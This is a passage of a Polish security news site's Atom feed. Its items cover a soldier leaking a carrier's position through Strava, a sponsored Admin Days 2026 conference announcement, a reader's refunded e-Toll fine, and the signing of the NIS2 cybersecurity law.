<p>Ale zanim zaczniecie pisać &#8220;<strong>jakież to było nieodpowiedzialne i groźne zachowanie!</strong>&#8220;, warto zwrócić uwagę, że <strong>lotniskowce to nie okręty podwodne</strong> i do najmniejszych nie należą. Innymi słowy: łatwo można je zlokalizować za pomocą <strong>zdjęć satelitarnych</strong> (także tych dostępnych dla cywili) jak również odpowiednich serwisów pokazujących ruchy jednostek wodnych (o ile nie wyłączą AIS):</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/charles.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/charles-600x386.jpg" alt="" width="600" height="386" class="aligncenter size-large wp-image-26914" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/charles-600x386.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/charles-350x225.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/charles-768x494.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/charles.jpg 1507w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Żołnierzu, dbaj o OPSEC!</h3>
<p>Tym niemniej, jeśli jest się żołnierzem, to nie powinno się korzystać z aplikacji, które posyłają lokalizację w świat, nawet na lotniskowcu nadającym swoją pozycję. Bo jeszcze wejdzie to komuś w krew i nieszczęście gotowe &#8212; tego typu sygnały mogą być powodem bombardowanka ze strony wroga.<br />
￼<br />
Zresztą ryzykiem jest nie tylko ostrzelanie. Strava ujawnia informacje na temat użytkownika, więc <strong>można na tej podstawie określić kto konkretnie bierze udziałw danej misji</strong>. I gdzie biegał wcześniej oraz gdzie mieszka. A to otwiera szereg nowych możliwości ze strony wroga, nie mniej spektakularnych niż uderzenia kinetyczne. </p>
<div class="info">Ten akurat incydent może być ciekawym zadaniem z fizyki dla licealistów. Znając prędkość statku, oceń czas w jakim żołnierz przebiegł pełne okrążenie.</div>
<h3>Każdy powinien znać zagrożenia dla prywatności</h3>
<p>W dzisiejszym świecie przypadkiem można ujawnić nie tylko swoją lokalizację. I nie tylko na smartwatche i aplikacje do biegania trzeba uważać. Co jeszcze stanowi zagrożenie dla naszej prywatności? Czego nie robić, jak zabezpieczyć się przed wyciekami danych? O tych i innych tematach mówimy na naszym wykładzie &#8220;<a href="https://niebezpiecznik.pl/wyklad" target="_blank">Jak Nie Dać Się Zhackować?</a>&#8220;, który już niebawem odbędzie się w: </p>
<ul>
<li><a href="https://nbzp.cz/jnsz-kra2604" target="_blank">Krakowie, 9 kwietnia &#8212; zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-waw2604" target="_blank">Warszawie, 16 kwietnia &#8212; zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-wro2606" target="_blank">Wrocławiu, 11 czerwca &#8212; zapisz się tutaj!</a></li>
</ul>
<p>W trakcie tego trwającego ~3h wykładu przystępnym i zrozumiałym dla każdego językiem omawiamy ataki, jakie dziś zagrażają Polakom. Ataki, których każdy musi być dziś świadomy. Wiele z nich pokazujemy na żywo, więc masz okazję poczuć się jak ofiara, ale bez żadnych negatywnych skutków. To kształcące doświadczenie&#8230; Gwarantujemy, że z wykładu wyjdziesz bezpieczniejszy. Ze sprawdzonymi i prostymi do zastosowania radami, które podniosą bezpieczeństwo Twoich danych, pieniędzy i prywatności. Radami od praktyków. Zadbaj o bezpieczeństwo siebie i Twoich najbliższych &#8212; zabierz ich na nasz wykład. <a href="https://bilety.niebezpiecznik.pl" target="_blank">Zapisz się na tej stronie</a> &#8212; do zobaczenia na sali wykładowej! </p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/lotniskowiec-charles-de-gaulle-strava-zolnierz-smartwach-bieganie/#comments" rel="replies" thr:count="6" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/lotniskowiec-charles-de-gaulle-strava-zolnierz-smartwach-bieganie/feed/atom/" rel="replies" thr:count="6" type="application/atom+xml"/>
			<thr:total>6</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Active Directory, ransomware i logi bez ściemy. W kwietniu wraca Admin Days 2026]]></title>
		<link href="https://niebezpiecznik.pl/post/active-directory-ransomware-i-logi-bez-sciemy-w-kwietniu-wraca-admin-days-2026/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26901</id>
		<updated>2026-03-06T09:45:18Z</updated>
		<published>2026-03-06T09:45:18Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Admin Days"/><category scheme="https://niebezpiecznik.pl" term="ARTYKUŁ SPONSOROWANY"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/active-directory-ransomware-i-logi-bez-sciemy-w-kwietniu-wraca-admin-days-2026/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Niebezpiecznik_Artykul_AD_2026_2026-03-06_10-40-32-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>W IT też bywa sezon ogórkowy. Tyle że zamiast ogórków mamy zaległe tickety, niedokończone migracje i alerty. Gdzieś między kolejnym zgłoszeniem na helpdesku a odkładaną aktualizacją zaczynasz się zastanawiać, czy w tym zawodzie chodzi jeszcze o coś więcej niż gaszenie pożarów i czy wiedza, którą zbierasz latami, nadal ma jakieś znaczenie&#8230; Ma! Tylko trzeba ją [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/active-directory-ransomware-i-logi-bez-sciemy-w-kwietniu-wraca-admin-days-2026/"><![CDATA[<p>W IT też bywa sezon ogórkowy. Tyle że zamiast ogórków mamy zaległe tickety, niedokończone migracje i alerty. Gdzieś między kolejnym zgłoszeniem na helpdesku a odkładaną aktualizacją zaczynasz się zastanawiać, czy w tym zawodzie chodzi jeszcze o coś więcej niż gaszenie pożarów i czy wiedza, którą zbierasz latami, nadal ma jakieś znaczenie&#8230;<span id="more-26901"></span></p>
<p>Ma! Tylko trzeba ją czasem odkurzyć &#8211; a kiedy jak nie na wiosnę? Dlatego w kwietniu wraca konferencja <a href="https://nbzp.cz/sD5M" target="_blank">Admin Days 2026</a> &#8211; wydarzenie, które od siedmiu lat zbiera tysiące ludzi i dziesiątki ekspertów, a także najgłośniejsze tematy i nazwiska dając przestrzeń do dialogu i wymiany doświadczeń.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Niebezpiecznik_Artykul_AD_2026_2026-03-06_10-40-32.png"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Niebezpiecznik_Artykul_AD_2026_2026-03-06_10-40-32-278x250.png" alt="" width="278" height="250" class="aligncenter size-medium wp-image-26902" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Niebezpiecznik_Artykul_AD_2026_2026-03-06_10-40-32-278x250.png 278w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Niebezpiecznik_Artykul_AD_2026_2026-03-06_10-40-32-600x539.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Niebezpiecznik_Artykul_AD_2026_2026-03-06_10-40-32-768x690.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Niebezpiecznik_Artykul_AD_2026_2026-03-06_10-40-32.png 884w" sizes="auto, (max-width: 278px) 100vw, 278px" /></a></p>
<h3>Admin Days 2026 &#8211; co, gdzie i jak?</h3>
<p>Ósma edycja <strong>Admin Days</strong> odbędzie się w dniach 21–23 kwietnia w formule online i uraczy widzów plejadą gwiazd IT oraz cybersec. Wystąpią między innymi: Artur Markiewicz, Agata Ślusarek, Adam Lange, Marcel Guzenda, Sławomir Szmulik i wielu, wielu innych! Organizatorzy pozostają przy sprawdzonym modelu, ale rozbudowali program o nową ścieżkę „Admin Talks”, czyli rozmowy eksperckie bez slajdów sprzedażowych i marketingowych wstępów.</p>
<p>Agenda została podzielona na trzy dni:</p>
<li>21 kwietnia &#8211; transmisja na żywo ze studia nagraniowego: prelekcje keynote i rozmowy w formule Admin Talks.</li>
<li>22 i 23 kwietnia &#8211; warsztaty prowadzone na żywo w formule webinarowej, z większym naciskiem na technikę i praktykę.</li>
<p>&nbsp;</p>
<p>To nie jest kolejna konferencja o trendach. Tematyka dotyczy wyzwań, które administratorzy i specjaliści IT widzą w swojej pracy regularnie:</p>
<li>realnych problemów i technicznych wyzwań w infrastrukturze,</li>
<li>analizy zdarzeń i incydentów oraz tego, jak wyciągać z nich wnioski operacyjne,</li>
<li>roli edukacji pracowników w ograniczaniu skuteczności ataków,</li>
<li>przejmowania i zabezpieczania Active Directory,</li>
<li>kulis działania grup przestępczych i współczesnej cyberprzestępczości.</li>
<p>&nbsp;</p>
<h3>Admin Days 2026 &#8211; kto wystąpi?</h3>
<p>Na wirtualnej scenie Admin Days 2026 pojawią się praktycy, którzy na co dzień pracują z infrastrukturą, incydentami i bezpieczeństwem:</p>
<li>Paula Januszkiewicz opowie o realnych scenariuszach ataków na Active Directory i najczęściej pomijanych elementach zabezpieczeń.</li>
<li>Artur Markiewicz przeanalizuje model działania grup ransomware i to, jak wygląda ich operacyjna strona.</li>
<li>Agata Ślusarek i Adam Lange zajrzą za kulisy cyberprzestępczości.</li>
<li>Sławomir Szmulik pokaże, jak podejść do logów w praktyce i jak nie utonąć w szumie danych.</li>
<li>Marcel Guzenda poruszy temat bezpieczeństwa sieci i realnych słabości infrastruktury.</li>
<li>Mirosław Gumularz odniesie się do kwestii bezpieczeństwa i odpowiedzialności organizacyjnej.</li>
<li>Alina Kobyłecka poprowadzi warsztatową część w formule Cyber RPG.</li>
<li>Piotr Adamczyk i Marcin Matuszewski w rozmowie „U nas działa!” pokażą, jak wygląda IT bez marketingowej narracji.</li>
<li>Tomasz Domalewski przyjrzy się temu, co dzieje się między kliknięciem a incydentem.</li>
<li>Przemysław Frąk i Leszek Skórniewicz poruszą temat gotowości audytowej i praktycznego podejścia do kontroli.</li>
<p>&nbsp;</p>
<h3>Admin Days 2026 &#8211; bo wiedza w IT musi działać</h3>
<p>Czy warto wziąć udział? Warto, bo w IT najdroższe nie są narzędzia, tylko błędy, zwłaszcza te, które można było przewidzieć. Czasem wystarczy usłyszeć, jak ktoś inny poradził sobie z incydentem, jak podszedł do zabezpieczenia AD albo jak uporządkował chaos w logach, żeby uniknąć kilku miesięcy prób i testów we własnym środowisku. Admin Days 2026 daje właśnie taką możliwość: skonfrontowania własnych rozwiązań z praktyką innych i zadania pytań ludziom, którzy mierzą się z tymi samymi wyzwaniami.</p>
<p>Udział w wydarzeniu jest bezpłatny &#8211; wystarczy się zarejestrować. W trakcie konferencji przewidziane są konkursy i nagrody dla uczestników, a rozmowy nie kończą się wraz z ostatnim slajdem. Równolegle działa społeczność na Discordzie, gdzie można kontynuować dyskusje, dopytać się o coś prelegentów i wymienić się doświadczeniami z innymi administratorami oraz specjalistami IT.</p>
<p>Jeśli więc chcesz wykorzystać trzy kwietniowe dni nie na kolejne „inspiracje”, ale na konkretną wiedzę i branżową rozmowę bez marketingowej otoczki — <a href="https://nbzp.cz/sD5O" target="_blank">rejestracja na Admin Days 2026</a> już czeka! </p>
<p><small>Przeczytałeś artykuł jest sponsorowany, za którego publikację otrzymaliśmy wynagrodzenie. Jeśli i Ty chcesz zareklamować się na łamach Niebezpiecznika, <a href="mailto:reklama@niebezpiecznik.pl" target="_blank">daj nam znać</a>.</small></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/active-directory-ransomware-i-logi-bez-sciemy-w-kwietniu-wraca-admin-days-2026/#comments" rel="replies" thr:count="0" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/active-directory-ransomware-i-logi-bez-sciemy-w-kwietniu-wraca-admin-days-2026/feed/atom/" rel="replies" thr:count="0" type="application/atom+xml"/>
			<thr:total>0</thr:total>
			</entry>
		<entry>
		<author>
			<name>Marcin Maj</name>
							<uri>https://niebezpiecznik.pl</uri>
						</author>

		<title type="html"><![CDATA[Skarbówka odda pieniądze naszemu Czytelnikowi (finał sprawy z błędem w e-Toll)]]></title>
		<link href="https://niebezpiecznik.pl/post/szymon-odzyska-pieniadze-ktorych-skarbowka-zazadala-za-przejazd-a4/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26895</id>
		<updated>2026-03-04T12:43:16Z</updated>
		<published>2026-03-04T12:37:18Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="aplikacje mobilne"/><category scheme="https://niebezpiecznik.pl" term="błędy"/><category scheme="https://niebezpiecznik.pl" term="e-TOLL"/><category scheme="https://niebezpiecznik.pl" term="kas"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/szymon-odzyska-pieniadze-ktorych-skarbowka-zazadala-za-przejazd-a4/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/etoll-150x150.jpeg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>W systemie e-Toll był błąd, który powodował naliczanie niesłusznych kar za rzekomo nieopłacone przejazdy autostradą (po latach!). Nasz Czytelnik Szymon podrążył temat i pieniądze odzyska. Było warto walczyć o swoje choć nie było całkiem łatwo. Przypomnijmy. W lutym pisaliśmy o tym, że niektórym osobom zdarza się dostać wezwanie za nieopłacony przejazd autostradą, mimo iż autostrady [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/szymon-odzyska-pieniadze-ktorych-skarbowka-zazadala-za-przejazd-a4/"><![CDATA[<p>W systemie e-Toll był błąd, który powodował naliczanie niesłusznych kar za rzekomo nieopłacone przejazdy autostradą (po latach!). Nasz Czytelnik Szymon podrążył temat i pieniądze odzyska. Było warto walczyć o swoje choć nie było całkiem łatwo.</p>
<p><span id="more-26895"></span></p>
<p>Przypomnijmy. W lutym pisaliśmy o tym, że<strong> niektórym osobom zdarza się dostać wezwanie za nieopłacony przejazd autostradą</strong>, mimo iż autostrady państwowe już dawno nie są płatne. Ewentualne wezwania dotyczą tego okresu, kiedy opłatę przejazd wnosiło się przez zakup biletu w aplikacji lub na stacji benzynowej. Opisywaliśmy <a href="https://niebezpiecznik.pl/post/wezwanie-do-zaplaty-a4-mandat-etoll-autostrada/">przypadek Szymona</a>, który porównał dane o przejeździe w systemie eToll z tymi, które miał w Google Maps. Okazało się, że system błędnie zarejestrował znaczniki czasowe przejazdu oraz &#8211; co najważniejsze &#8211; części przejzadu zaliczył do innego dnia co powodowało niesłuszne naliczenie opłaty.</p>
<p>Szymona napisał.</p>
<blockquote><p>Sprawa w końcu ma swój (szczęśliwy) finał. Sprzeciw uwzględniony, <strong>pieniądze oddadzą w ciągu 30 dni</strong>. Ale ile czasu musiałem na to wszystko stracić&#8230; Ehhh, szkoda gadać. A <strong>w sumie nadal nie wiadomo ilu rzeczywiście jest pokrzywdzonych kierowców</strong> oraz jak często ten błąd występował. Bo w ich tłumaczenie, że to de facto wina mojego urządzenia, to nie wierzę. To u mnie w telefonie musiałaby się data nie zmienić i ich aplikacja odczytałaby z mojego smartfona błędną datę. Raczej nierealne, tym bardziej, że historia lokalizacji Google Maps nie miała żadnych błędów, a rejestrowała się dokładnie na tym samym urządzeniu. Błąd jest ewidentnie po ich stronie, ale nie wiem co trzeba by zrobić, żeby się przyznali.</p></blockquote>
<p>Pismo od skarbówki wyglądało tak.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/sprzec.png"><img loading="lazy" decoding="async" class="size-large wp-image-26896 aligncenter" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/sprzec-417x600.png" alt="" width="417" height="600" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/sprzec-417x600.png 417w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/sprzec-174x250.png 174w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/sprzec.png 519w" sizes="auto, (max-width: 417px) 100vw, 417px" /></a></p>
<p>Już wcześniej w odpowiedzi na nasze pytania <strong>Ministerstwo Finansów przyznało, że takie sytuacje mogą się zdarzać</strong>.  Twierdzi jednocześnie, że problem nie jest powszechny i często wynika z błędów urządzeń użytkowników.</p>
<p>Szymon był uparty. Wiele innych osób może zapłacić &#8220;dla świętego spokoju&#8221;. Jeśli ktoś postanowi drążyć sprawę to niestety łatwo nie jest, o czym również pisał nam Szymon.</p>
<blockquote><p>Większość osób ma zamknięte konto e-Toll, zrobili to rok temu, gdy e-Toll masowo wysyłał maile zachęcające do zamknięcia konta, żeby dostać zwrot środków z przedpłaty na koncie. Mając zamknięte konto nie da się sprawdzić historii przejazdów. Trzeba wysłać zgłoszenie, na które e-Toll ma czas na odpowiedź do 30 dni, a czas na wniesienie sprzeciwu to 14 dni. No ja akurat odpowiedź dostałem szybko, ale czy zawsze tak będzie? Warto byłoby to też poruszyć z MF/KAS. Odpowiedź dostajemy w pliku CSV.</p></blockquote>
<p>Szczegóły w naszym artykule pt. <a href="https://niebezpiecznik.pl/post/wezwanie-do-zaplaty-a4-mandat-etoll-autostrada/">Możesz dostać 500zł mandatu, bo system poboru opłat na A4 miał ciekawy błąd.</a></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/szymon-odzyska-pieniadze-ktorych-skarbowka-zazadala-za-przejazd-a4/#comments" rel="replies" thr:count="10" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/szymon-odzyska-pieniadze-ktorych-skarbowka-zazadala-za-przejazd-a4/feed/atom/" rel="replies" thr:count="10" type="application/atom+xml"/>
			<thr:total>10</thr:total>
			</entry>
		<entry>
		<author>
			<name>Marcin Maj</name>
							<uri>https://niebezpiecznik.pl</uri>
						</author>

		<title type="html"><![CDATA[Prezydent podpisał ustawę KSC/NIS2 i wysłał ją do Trybunału]]></title>
		<link href="https://niebezpiecznik.pl/post/prezydent-podpisal-ustawe-ksc-nis2-i-wyslal-ja-do-trybunalu/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26891</id>
		<updated>2026-02-20T07:57:40Z</updated>
		<published>2026-02-20T07:57:40Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="NIS2"/><category scheme="https://niebezpiecznik.pl" term="Prezydent"/><category scheme="https://niebezpiecznik.pl" term="Ustawa o krajowym systemie cyberbezpieczeństwa"/><category scheme="https://niebezpiecznik.pl" term="ustawy"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/prezydent-podpisal-ustawe-ksc-nis2-i-wyslal-ja-do-trybunalu/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/02/20250722-PKN-14055-150x150.jpg" class="alignleft tfe wp-post-image" alt="Karol Nawrocki" decoding="async" loading="lazy" /></a>Niewątpliwie najważniejsza dla polskiego cyberbezpieczeństwa ustawa uzyskała podpis Prezydenta. Została jednak wysłana do Trybunału Konstytucyjnego co oznacza, że niektóre jej przepisy z czasem mogą być uchylone. Tak czy owak trzeba się szykować na wdrażanie NIS2. Tydzień temu pisaliśmy o ustawie o Krajowym Systemie Cyberbezpieczeństwa, która ma wdrażać w Polsce unijną dyrektywę NIS2. Wówczas ustawa wyszła [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/prezydent-podpisal-ustawe-ksc-nis2-i-wyslal-ja-do-trybunalu/"><![CDATA[<p>Niewątpliwie najważniejsza dla polskiego cyberbezpieczeństwa ustawa uzyskała podpis Prezydenta. Została jednak wysłana do Trybunału Konstytucyjnego co oznacza, że niektóre jej przepisy z czasem mogą być uchylone. Tak czy owak trzeba się szykować na wdrażanie NIS2.</p>
<p><span id="more-26891"></span></p>
<p>Tydzień temu pisaliśmy o <a href="https://niebezpiecznik.pl/post/najwazniejsza-dla-cyberbezpieczenstwa-ustawa-wdrazajaca-nis2-czeka-na-podpis-prezydenta/">ustawie o Krajowym Systemie Cyberbezpieczeństwa</a>, która ma wdrażać w Polsce unijną dyrektywę <strong>NIS2</strong>. Wówczas ustawa wyszła z Senatu (bez poprawek) i czekała na podpis Prezydenta. Złożenie tego podpisu wielu osobom wydawało się formalnością (naprawdę tej ustawy podpisujemy), ale ten akt prawny miał swoich przeciwników. Protestowali przeciwko niemu niektórzy przedsiębiorcy, na których mają zostać nałożone nowe obowiązki (otwarcie przeciwko ustawie opowiedziała się Krajowa Izba Komunikacji Ethernetowej &#8211; KIKE). Byli też prawnicy z wątpliwościami. Prof. <a href="https://www.rp.pl/prawo-w-polsce/art43788821-prof-ryszard-piotrowski-ustawa-o-cyberbezpieczenstwie-na-bakier-z-konstytucja">Ryszard Piotrkowski przekonywał</a>, że bezpieczeństwo państwa nie uzasadnia tworzenia prawa, które trwale godziłoby we własność i swobodę działalności gospodarczej. W Sejmie odbyło się nawet zamknięte posiedzenie komisji cyfryzacji poświęcone lobbingowi wokół nowelizacji.</p>
<p><strong>Wczoraj Prezydent ustawę podpisał, ale odesłał ją do Trybunału Konstytucyjnego</strong> w ramach kontroli następczej. Trybunał może uchylić część przepisów.</p>
<p>Z informacji wystosowanej przez Kancelarię Prezydenta wynika, że zastrzeżenia Prezydenta wobec ustawy są następujące:</p>
<ol>
<li>Wątpliwości budzi objęcie ustawą 18 branż gospodarki pogrupowanych w podmioty kluczowe i ważne. Przy czym &#8211; zdaniem Prezydenta &#8211; rozszerzenie to nie wynika z przepisów europejskich, a jest samodzielną inicjatywą rządu.</li>
<li>Przepisy dotyczące uznawania firm za Dostawców Wysokiego Ryzyka (DWR) ingerują w samodzielność funkcjonowania przedsiębiorców poprzez nakładanie obowiązku wymiany sprzętu oraz<br />
oprogramowania bez odszkodowania i bez zabezpieczenia środków finansowych na ten cel.</li>
<li>Przewidziany ustawą system kar administracyjnych jest restrykcyjny, a wysokość możliwych do nałożenia kar ma charakter samodzielnych środków karnych.</li>
<li>System podejmowania decyzji przez organy ds. cyberbezpieczeństwa wobec podmiotów kluczowych i ważnych jest wadliwy m.in. pozbawiony odpowiedniej kontroli sądowej.</li>
</ol>
<p>Warto w tym momencie przypomnieć, że w trakcie prac nad ustawą wprowadzono przepis, który pozwala nakładać kary za naruszenia dopiero po upływie 2 lat od dnia wejścia w życie ustawy (art. 35 nowelizacji). Sama ustawa wchodzi w życie po upływie miesiąca od ogłoszenia, ale podmioty, które z dniem wejścia w życie niniejszej ustawy spełniają przesłanki uznania ich za podmiot kluczowy albo za podmiot ważny, realizują obowiązki w brzmieniu nadanym ustawą w terminie 12 miesięcy od dnia wejścia w życie. Wdrażanie przepisów będzie tak czy owak nieco rozciągnięte w czasie np. minister ds. cyfryzacji będzie musiał przygotować harmonogram, według którego firmy będą zobowiazane składać wniosek o wpis do wykazu podmiotów kluczowych.</p>
<p>Niemniej ustawa już jest i trzeba zacząć ją wdrażać. Więcej o ustawie artykule pt. <a href="https://niebezpiecznik.pl/post/najwazniejsza-dla-cyberbezpieczenstwa-ustawa-wdrazajaca-nis2-czeka-na-podpis-prezydenta/">Najważniejsza dla cyberbezpieczeństwa ustawa wdrażająca NIS2 czeka na podpis Prezydenta</a></p>
<p>&nbsp;</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/prezydent-podpisal-ustawe-ksc-nis2-i-wyslal-ja-do-trybunalu/#comments" rel="replies" thr:count="25" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/prezydent-podpisal-ustawe-ksc-nis2-i-wyslal-ja-do-trybunalu/feed/atom/" rel="replies" thr:count="25" type="application/atom+xml"/>
			<thr:total>25</thr:total>
			</entry>
	</feed>